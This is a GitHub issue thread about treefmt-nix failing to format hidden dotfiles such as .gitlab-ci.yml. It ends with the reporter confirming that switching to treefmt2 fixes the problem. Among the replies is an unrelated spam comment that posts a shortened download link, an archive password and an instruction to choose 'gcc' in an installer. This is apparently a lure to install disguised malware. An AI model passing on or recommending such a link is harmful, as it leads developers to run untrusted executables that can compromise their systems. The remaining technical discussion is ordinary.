### ISSUE TITLE
Can't format hidden / dotfiles (on original treefmt)

### ISSUE THREAD

**Issue by declension** [numtide/treefmt-nix#228]
**Describe the bug**

Can't get `yamlfmt` (and probably other formatters) to process "hidden" / "dotfiles", i.e. files with a leading `.`.

This is particularly annoying for certain CI systems, where the primary configuration is in YAML with names like `.gitlab-ci.yml`.

**To Reproduce**

* Configure a project with `treefmt-nix`
* Configure with `programs.yamlfmt.enable = true`
* Add a slightly malformed YAML file, `test.yaml` and a copy at `.test.yaml`
* `nix fmt`

**Expected behavior**

Both are formatted

But only one is...

**Additional**

Have tried various combinations of global and per-formatter include / exclude overrides, but no joy!

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by declension** [comment]
Can also replicate this with recent `treefmt-nix` on other formatters e.g. `shfmt`, so widening the title

**Comment by declension** [comment]
Ah, so maybe this is just a downstream effect of https://github.com/numtide/treefmt/issues/153

**Comment by brianmcgee** [comment]
What version of `treefmt` are you using?

**Comment by declension** [comment]
> What version of treefmt are you using?

Yes, I started to wonder about this too. A few different versions in a few places, but generally pinning to nixpkgs 24.05, and pinning treefmt's inputs to that. So then `0.6.1` I think.

**Comment by brianmcgee** [comment]
You want to use [treefmt2](https://search.nixos.org/packages?channel=24.05&show=treefmt2&from=0&size=50&sort=relevance&type=packages&query=treefmt2) instead. 

If you use [treefmt-nix](https://github.com/numtide/treefmt-nix) it will automatically use the latest version. `treefmt` is pointing to the old rust branch and is kept for posterity until version stabilises at which point we'll update it (quite soon I think). `treefmt2` points to the latest version which was re-written in Go.

**Comment by jwillikers** [comment]
This appears to be an issue for hidden justfiles, `.justfile`, too. I think this is related to the just formatter in this case.

**Comment by declension** [comment]
Can confirm this all works when upgrading to `treefmt2`. Given this is all in nixpkgs `24.11`, I'd say we can close the issue (but pleas re-open if still relevant)
